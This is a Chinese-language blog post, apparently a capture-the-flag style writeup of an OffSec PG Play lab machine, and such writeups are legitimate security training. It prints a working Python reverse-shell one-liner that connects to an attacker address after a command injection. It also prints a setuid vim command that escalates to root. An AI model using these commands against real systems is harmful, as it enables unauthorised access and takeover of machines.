iT邦幫忙

2023 iThome 鐵人賽

DAY 3
0

防雷頁


























可能的遺漏

  • web 頁面輸入
  • 可能存在防火牆
  • 進入機器後, 檢查程式檔案權限

摘要

  • 透過 web 頁面 command injection 取得權限
  • 要使用 web 一般 port 進行 reverse shell
  • 透過找到有 setuid 的程式, 使用 vim 進行提權

Walkthrough

  • 先透過 nmap 確認開什麼 port 和什麼服務
    nmap

  • dirb 掃描網站目錄
    dirb

  • 手動檢查網站
    web01

  • 功能正常可以 ping 127.0.0.1
    https://ithelp.ithome.com.tw/upload/images/20230917/20078298DWPRruhc9o.png

  • 功能正常可以 ping 回攻擊機
    https://ithelp.ithome.com.tw/upload/images/20230917/20078298riZn7IeStP.png

  • 存在 command injection 弱點
    https://ithelp.ithome.com.tw/upload/images/20230917/20078298SQj0BQgRSr.png

  • 使用 python 打 reverse shell 回到攻擊機

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.227",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

https://ithelp.ithome.com.tw/upload/images/20230917/20078298V1vDwIOxO6.png

  • 使用 python 取得 pty shell
    python3 -c 'import pty; pty.spawn("/bin/bash")'

  • get local.txt
    https://ithelp.ithome.com.tw/upload/images/20230917/2007829856KAtVBWuZ.png

  • find setuid program
    https://ithelp.ithome.com.tw/upload/images/20230917/20078298PD2nqGMAPS.png

  • 使用 vim 提權為 root
    /usr/bin/vim.basic -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "/bin/bash")'

  • get proof.txt
    https://ithelp.ithome.com.tw/upload/images/20230917/20078298hIBQswKgrR.png

ref


上一篇
[Day 02] How to practice PG Play from zero ?
下一篇
[Day 04] PG Play Sar Writeup
系列文
PG Play 怎麼玩都不累 - 靶機 writeup 思路分享30
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言